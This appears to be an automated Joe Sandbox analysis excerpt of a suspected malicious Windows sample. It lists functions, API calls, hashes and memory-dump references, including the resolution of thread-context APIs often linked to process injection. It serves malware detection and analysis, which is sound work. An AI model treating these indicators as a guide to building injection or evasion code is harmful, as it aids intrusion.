Part of subcall function 00007FF6D38BD690: HeapAlloc.KERNEL32(?,?,00000000,00007FF6D38BD113), ref: 00007FF6D38BD6E5

FindFirstFileExW.KERNEL32 ref: 00007FF6D38BE009

Part of subcall function 00007FF6D38BD710: RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D38B5A73), ref: 00007FF6D38BD726
Part of subcall function 00007FF6D38BD710: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D38B5A73), ref: 00007FF6D38BD730

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: Heap$AllocErrorFileFindFirstFreeLast
String ID:
API String ID: 3251937280-0
Opcode ID: 8ce16b4af11dbaf6733765fda3318459a18abbd264d1fc9627a04c28bc0937eb
Instruction ID: 21837445c9e5091cdc5986532408cfc4008359f14205d98ce57b26792f653361
Opcode Fuzzy Hash: 8ce16b4af11dbaf6733765fda3318459a18abbd264d1fc9627a04c28bc0937eb
Instruction Fuzzy Hash: AD811922B0968396EB20DF22A4521BEF791EB447D0F044636EE9DAB795DF3DE065C700

Function 00007FF6D38BFDD0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6D38BFDD4

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 742f27eda0b73113af21d99aabb993d07b5ac91991eba8b126466927a6a3dc15
Instruction ID: a9f30847c3d5c577fbda8d360f63921f9ba0d90c704e6c1132813a38d7a36a0f
Opcode Fuzzy Hash: 742f27eda0b73113af21d99aabb993d07b5ac91991eba8b126466927a6a3dc15
Instruction Fuzzy Hash: 02B09220E07A02CAEA082B266C83218A3A8AF88700F98017AC40DA0320DF2D20F55710

Function 00007FF6D38BC474 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: c050c7e97806ecc8f3fbf7da6added3d29f01255d2499049a502a019ef95a73f
Instruction ID: 334918baa0518ec3c493de614b71f66bed70d926298b384f4192716602d63d0e
Opcode Fuzzy Hash: c050c7e97806ecc8f3fbf7da6added3d29f01255d2499049a502a019ef95a73f
Instruction Fuzzy Hash: 2141E422714A5586EF44CF6AE9565ADA3A1FB48FC0B09A037DE0DEBB58DE3DC4518300

Function 00007FF6D38C47B0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 564146d656022cf5ef80d643a566eb115e3ddacf2f0ede40187370848e14a606
Instruction ID: 0b120b63ded4f107ce7eccd4f87d5ee6d1b52b817dc61f2e51e377256c055fe7
Opcode Fuzzy Hash: 564146d656022cf5ef80d643a566eb115e3ddacf2f0ede40187370848e14a606
Instruction Fuzzy Hash: 441130B1A185968AF75A8F29A45333DE690EB44380F60813FD44DD7A98DE3E95A18F40

Function 00007FF6D38B6568 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58e1eef0a0552b1437ec5729938a04f017a033ca2a4130b0f2a560905de568e
Instruction ID: 1ff987f7337c3b0723da6dde74083189c90858713cd82203a3a4ad242e35b404
Opcode Fuzzy Hash: c58e1eef0a0552b1437ec5729938a04f017a033ca2a4130b0f2a560905de568e
Instruction Fuzzy Hash: 79A0012190880290F6058B20A8520B8A630AB60360B440132C00EB5464DF3EA4A48200

Function 00007FF6D38BAEAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF6D38BB15E,?,?,?,00007FF6D38BADAC,?,?,?,00007FF6D38B7705), ref: 00007FF6D38BAF31
GetLastError.KERNEL32(?,?,?,00007FF6D38BB15E,?,?,?,00007FF6D38BADAC,?,?,?,00007FF6D38B7705), ref: 00007FF6D38BAF3F
LoadLibraryExW.KERNEL32(?,?,?,00007FF6D38BB15E,?,?,?,00007FF6D38BADAC,?,?,?,00007FF6D38B7705), ref: 00007FF6D38BAF69
FreeLibrary.KERNEL32(?,?,?,00007FF6D38BB15E,?,?,?,00007FF6D38BADAC,?,?,?,00007FF6D38B7705), ref: 00007FF6D38BAFD7
GetProcAddress.KERNEL32(?,?,?,00007FF6D38BB15E,?,?,?,00007FF6D38BADAC,?,?,?,00007FF6D38B7705), ref: 00007FF6D38BAFE3

Strings

api-ms-, xrefs: 00007FF6D38BAF51

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 70d20b4fd85e3af5d53dad17edd22564afe130343120c1cce0ebaa8200017b51
Instruction ID: 29c10181ec851fb5d85c333bbeef6ef1d069fb56e51c2b9951ab35df7826330e
Opcode Fuzzy Hash: 70d20b4fd85e3af5d53dad17edd22564afe130343120c1cce0ebaa8200017b51
Instruction Fuzzy Hash: A831D861B1AB4392EE92DB42A8025BDA394BF44B60F594537DD1DAF350EF3DE460C300

Function 00007FF6D38C44C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6D38C44F1
GetLastError.KERNEL32 ref: 00007FF6D38C44FD
CloseHandle.KERNEL32 ref: 00007FF6D38C4515
CreateFileW.KERNEL32 ref: 00007FF6D38C4540
WriteConsoleW.KERNEL32 ref: 00007FF6D38C455F

Strings

CONOUT$, xrefs: 00007FF6D38C4521

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 4dc64728900aa44a8f3ee1928aac7f4e0ec967892ec1f88a52295b80de22eba4
Instruction ID: 240bbaa695a05257a34f8b35500d938ad9c97acf249a47a837a4785e711f3daa
Opcode Fuzzy Hash: 4dc64728900aa44a8f3ee1928aac7f4e0ec967892ec1f88a52295b80de22eba4
Instruction Fuzzy Hash: D3118E21A18A5186E7508B52E84532DB6A0FB88BE4F144336EA5EE7BA4CF3DD5648740

Function 00007FF6D38B1560 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 17libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF6D38B156B
GetProcAddress.KERNEL32 ref: 00007FF6D38B158C
GetProcAddress.KERNEL32 ref: 00007FF6D38B15A5

Strings

Wow64SetThreadContext, xrefs: 00007FF6D38B1599
Wow64GetThreadContext, xrefs: 00007FF6D38B1580
kernel32.dll, xrefs: 00007FF6D38B1564

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: Wow64GetThreadContext$Wow64SetThreadContext$kernel32.dll
API String ID: 667068680-2231968190
Opcode ID: 88e2ed8696b6f356f76e51e3a754e28b8371d40434c3b53e81f18f3534fa5869
Instruction ID: c2d316323377ea46e7cd581e40e0657296af4eb86d50021d3c2d5dc33de8a85e
Opcode Fuzzy Hash: 88e2ed8696b6f356f76e51e3a754e28b8371d40434c3b53e81f18f3534fa5869
Instruction Fuzzy Hash: CDF09225A09A4286E6609F10F84623DB3A0FF88796F440633D98FB6324DF3EE169C700

Function 00007FF6D38BD0CC Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6D38BD0DB
SetLastError.KERNEL32 ref: 00007FF6D38BD0FA
FlsSetValue.KERNEL32 ref: 00007FF6D38BD123
FlsSetValue.KERNEL32 ref: 00007FF6D38BD134
FlsSetValue.KERNEL32 ref: 00007FF6D38BD145

Part of subcall function 00007FF6D38BD710: RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D38B5A73), ref: 00007FF6D38BD726
Part of subcall function 00007FF6D38BD710: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D38B5A73), ref: 00007FF6D38BD730

SetLastError.KERNEL32 ref: 00007FF6D38BD168

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: ad3e04f760774e8ae16c30c1ddec31f55481af941b6ad511bb8b4b713f93ab09
Instruction ID: d4994aa72d012335980113e94dbc25768a27a2a3a407d9e4af44a90ad2750e66
Opcode Fuzzy Hash: ad3e04f760774e8ae16c30c1ddec31f55481af941b6ad511bb8b4b713f93ab09
Instruction Fuzzy Hash: 35111221F0D24392FA58AB32A85317ED2516F84790F049637D81FFE6D6DE3EE4658300

Function 00007FF6D38BBBC0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6D38BBBE5
GetProcAddress.KERNEL32 ref: 00007FF6D38BBBFB
FreeLibrary.KERNEL32 ref: 00007FF6D38BBC17

Strings

CorExitProcess, xrefs: 00007FF6D38BBBF4
mscoree.dll, xrefs: 00007FF6D38BBBDC

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: ec3d55ae7820f6e2bfa5c8b5e2f9d7bd2020164957d7b55a40aca8d8ad71fb12
Instruction ID: b71c84fcb631b55e921c06328617723c7ec4a43c5dccf2ca7663bb182bd6ca15
Opcode Fuzzy Hash: ec3d55ae7820f6e2bfa5c8b5e2f9d7bd2020164957d7b55a40aca8d8ad71fb12
Instruction Fuzzy Hash: 76F03621A19A0281EB158B24A86637E9360AF85761F540737D66EEA1E4CF6ED0A5C700

Function 00007FF6D38C2DC4 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6D38C2E43
WriteFile.KERNEL32 ref: 00007FF6D38C3120
WriteFile.KERNEL32 ref: 00007FF6D38C3166
GetLastError.KERNEL32 ref: 00007FF6D38C3225

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 4375639266731b9171ccc7954d4bd795c36dea95ea2e7c4b3ded15d07dee15ba
Instruction ID: 48b69bd9fefa0dca04bae7e4ca7fb8a978a40de1ace645cb1256f384af904a1e
Opcode Fuzzy Hash: 4375639266731b9171ccc7954d4bd795c36dea95ea2e7c4b3ded15d07dee15ba
Instruction Fuzzy Hash: 2AD1CE32B18A8589EB11CFB5E4412ACB7B1FB44B98B444237DE5DA7B99DE39D126C300

Function 00007FF6D38C3710 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF6D38C36FB,00000000,?,00000000), ref: 00007FF6D38C382E

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: bf926e9bd223db4eac1b626c7606ab6d0b3391c1d8219bc7df21ca3d0b952b18
Instruction ID: 71648cb33747be26092b42c40cd2132cd19a0d69e4fe11d2dc7354a944baa8cc
Opcode Fuzzy Hash: bf926e9bd223db4eac1b626c7606ab6d0b3391c1d8219bc7df21ca3d0b952b18
Instruction Fuzzy Hash: 28910632F1865285FB509F6594422BDABA0FB44B88F144237DE0EB7684CF7EE066C700

Function 00007FF6D38B91C4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 190COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6D38B9234

Strings

MOC, xrefs: 00007FF6D38B9248
RCC, xrefs: 00007FF6D38B9250

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 2ceb377bf741a609b1b1c8dc4e9616561db7389bb9e0d62f614313ac5a7b942a
Instruction ID: 37496e2482b378bcbfcdc40aeea22bb7251944363baf41a0b1bd93915bd9d5f6
Opcode Fuzzy Hash: 2ceb377bf741a609b1b1c8dc4e9616561db7389bb9e0d62f614313ac5a7b942a
Instruction Fuzzy Hash: CD91A373A08B828AE750CF65D8912ADB7B0FB44788F144136EA8DAB755DF3DD1A5C700

Function 00007FF6D38B8F54 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6D38B8FB3

Strings

RCC, xrefs: 00007FF6D38B8FCF
MOC, xrefs: 00007FF6D38B8FC7

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720918858.00007FF6D38D7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D391E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720992961.00007FF6D393F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d38b0000_MACHINE SPECIFICATIONS.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 1699b2950e5bd17f813f0fcf52d20ce6053bf3572be77ace5efe6af918824a10
Instruction ID: 1a4162a99cc86d52dccdd788cbb671ead1eb4068b18e50cf63e72134ab8b9e41
Opcode Fuzzy Hash: 1699b2950e5bd17f813f0fcf52d20ce6053bf3572be77ace5efe6af918824a10
Instruction Fuzzy Hash: 1F619532908BC681DB209B15E4413AEF7A0FB95794F044236EB9DA7B55DF7DD1A0CB00

Function 00007FF6D38C347C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6D38C3594
GetLastError.KERNEL32 ref: 00007FF6D38C35B9

Strings

U, xrefs: 00007FF6D38C353E

Memory Dump Source

Source File: 00000000.00000002.106720760103.00007FF6D38B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D38B0000, based on PE: true

Associated: 00000000.00000002.106720731844.00007FF6D38B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720806000.00007FF6D38C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720837185.00007FF6D38D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.106720865208.00007FF6D38D3000.00000002.00000001.01000000.00000003.sdmpDownload File
